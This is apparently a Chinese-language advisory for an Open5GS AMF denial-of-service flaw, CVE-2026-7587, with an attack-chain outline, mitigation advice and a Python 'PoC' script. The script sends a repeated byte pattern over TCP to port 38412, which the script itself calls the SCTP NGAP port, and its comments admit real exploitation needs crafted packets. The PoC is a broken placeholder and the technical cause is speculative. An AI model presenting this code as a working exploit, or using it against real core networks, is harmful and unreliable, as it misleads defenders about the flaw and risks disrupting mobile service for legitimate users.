CVE-2026-7587 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7587

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是用于4G/5G移动核心网的开源项目。在Open5GS 2.7.7及更早版本中，AMF组件的`amf_nsmf_pdusession_handle_update_sm_context`函数被发现存在安全漏洞。该漏洞源于对PDU会话更新上下文处理的逻辑缺陷，位于`/src/amf/nsmf-handler.c`文件。攻击者可利用此漏洞发起远程攻击，无需用户交互且仅需低权限。成功利用该漏洞将导致目标系统服务不可用，造成拒绝服务。目前该漏洞利用细节已公开，厂商尚未发布补丁，用户需密切关注。

技术细节

该漏洞技术细节涉及Open5GS接入和移动性管理功能（AMF）中处理PDU会话更新的具体实现。漏洞点位于`/src/amf/nsmf-handler.c`文件的`amf_nsmf_pdusession_handle_update_sm_context`函数中。当AMF组件处理特定的PDU会话更新SM上下文请求时，未能正确处理特定的边界条件或异常输入，导致空指针引用或内存管理错误。攻击者可以通过向开放的AMF接口发送特制的网络数据包来触发该逻辑缺陷。由于CVSS向量为AV:N/AC:L/PR:L/UI:N/S:U，攻击者可以从远程位置发起攻击，且攻击复杂度较低。触发漏洞后，AMF进程将崩溃或停止响应，导致整个5G核心网无法处理新的连接请求，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者扫描互联网或内网，寻找对外开放的Open5GS AMF服务端口（如SCTP端口38412）。

STEP 2

构造请求

攻击者根据漏洞细节，构造特制的PDU会话更新请求数据包，旨在触发`amf_nsmf_pdusession_handle_update_sm_context`函数中的逻辑缺陷。

STEP 3

发起攻击

攻击者将恶意数据包通过网络发送至目标Open5GS AMF组件。

STEP 4

达成影响

目标AMF进程处理异常数据包后崩溃或挂起，导致5G核心网控制面瘫痪，合法用户无法接入网络，实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Proof of Concept for CVE-2026-7587
# This script demonstrates a conceptual denial of service attack on Open5GS AMF.
# Note: Actual exploitation requires crafting specific NGAP/HTTP2 packets.

def send_exploit_packet(target_ip, target_port):
    try:
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        
        # Connect to the Open5GS AMF interface
        s.connect((target_ip, target_port))
        
        # Mal payload triggering the vulnerability in amf_nsmf_pdusession_handle_update_sm_context
        # In a real scenario, this would be a specific malformed PDU Session Update SM Context message
        payload = b"\x00\x00\x00\x01" * 100  
        
        print(f"[+] Sending malicious payload to {target_ip}:{target_port}")
        s.sendall(payload)
        
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 38412  # Default SCTP port for NGAP, might vary based on config
    send_exploit_packet(TARGET_IP, TARGET_PORT)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在官方补丁发布前，建议通过访问控制列表（ACL）限制AMF组件仅接收来自可信网元（如RAN、SMF）的流量，阻断外部攻击路径。同时，应加强对核心网组件的异常状态监控，以便在遭受攻击时快速响应和恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7587
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7587
3 Details https://www.cvedetails.com/cve/CVE-2026-7587/
4 VulDB https://vuldb.com/cve/CVE-2026-7587
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4408
7 Link https://vuldb.com/submit/804339
8 Link https://vuldb.com/vuln/360540
9 Link https://vuldb.com/vuln/360540/cti